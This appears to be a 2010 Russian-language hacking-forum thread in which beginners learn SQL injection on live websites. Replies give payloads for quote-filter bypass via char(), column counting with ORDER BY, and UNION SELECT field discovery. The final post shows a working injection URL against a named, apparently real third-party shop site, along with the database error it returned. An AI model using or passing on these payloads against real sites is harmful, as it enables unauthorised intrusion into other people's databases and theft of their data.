21.01.2010, 17:33
|
|
Новичок
Регистрация: 24.01.2009
Сообщений: 13
С нами:
9102282
Репутация:
0
|
|
спасибо,а если на подставление кавычки и также всего остального вообще ничего не выскакивает кавычка не фильруеццо типа %20 а просто страничка остается такая же то это блайнд?
|
|
|
22.01.2010, 17:51
|
|
Новичок
Регистрация: 24.01.2009
Сообщений: 13
С нами:
9102282
Репутация:
0
|
|
А есть какой то фак по блайнду?
|
|
|
|
22.01.2010, 18:58
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от dimonle
А есть какой то фак по блайнду?
https://forum.antichat.net/showpost.php?p=407227&postcount=3
|
|
|
|
22.01.2010, 19:51
|
|
Новичок
Регистрация: 15.06.2008
Сообщений: 13
С нами:
9423494
Репутация:
8
|
|
Зачарь без кавычек. (http://jdstiles.com/java/cct.html)
Например: ... WHERE table_name=char(84, 65, 66, 76, 69)/*
|
|
|
|
25.01.2010, 19:36
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
Вот несколько вопросов:
1. Вот есть сайт типа "бла-бла.ру/ид1", если я поставлю "ид1’ ", и выдаст ошибку, типа
mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in
, то что нужно делать дальше? подбирать количество строк? типа:
news.php?id=3+order+by+10
?, или количество полей? типа:
news.php?id=1' UNION SELECT 1--
?
2. И еще, если есть готовая уязвимость например:
сайт.ру/list.php?id=-1+UNION+SELECT+1,2--
, что сделать дальше, чтобы попасть в бд? |
|
|
|
25.01.2010, 20:35
|
|
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
С нами:
8866466
Репутация:
564
|
|
2CyberHunter внимательно читай с первой страницы =\
|
|
|
|
25.01.2010, 22:41
|
|
Постоянный
Регистрация: 06.01.2010
Сообщений: 785
С нами:
8602291
Репутация:
256
|
|
2CyberHunter внимательно читай с первой страницы =\
Перечитал раза три...
Я просто не знаю языка sql =(.
Но прочитал статью и понял, что можно и без этого)).
Так может ответите? Не доходит и все =..(
|
|
|
|
25.01.2010, 23:42
|
|
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
С нами:
9644006
Репутация:
3099
|
|
Сообщение от CyberHunter
Перечитал раза три...
Я просто не знаю языка sql =(.
Но прочитал статью и понял, что можно и без этого)).
Так может ответите? Не доходит и все =..(
можно и без этого, читай все статьи.
|
|
|
|
31.01.2010, 02:26
|
|
Новичок
Регистрация: 17.01.2010
Сообщений: 4
С нами:
8586662
Репутация:
5
|
|
Сообщение от CyberHunter
Вот несколько вопросов:
1. Вот есть сайт типа "бла-бла.ру/ид1", если я поставлю "ид1’ ", и выдаст ошибку, типа
, то что нужно делать дальше? подбирать количество строк? типа:
?, или количество полей? типа:
?
Оператором order by ты находишь количество полей.
Union select 1,2...-ты определяешь принтабельное поле(т.е. то,через которое ты будешь выводить информацию)
|
|
|
|
21.03.2010, 21:12
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Чатсный случай1
Хоть и баян, но
Код:
_http://www.laptopshowcase.co.uk/downloads.php?id=-1/*
Ошибка такого вида:
Error performing query: Mixing of GROUP columns (MIN(),MAX(),COUNT()...) with no GROUP columns is illegal if there is no GROUP BY clause
Код:
_http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+1+union+select+1,2,version(),4,5,6,7,8,9,0,11/*
Терерь представляем себе что нет вывода ошибок!
Последний раз редактировалось Strilo4ka; 21.03.2010 в 21:19..
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
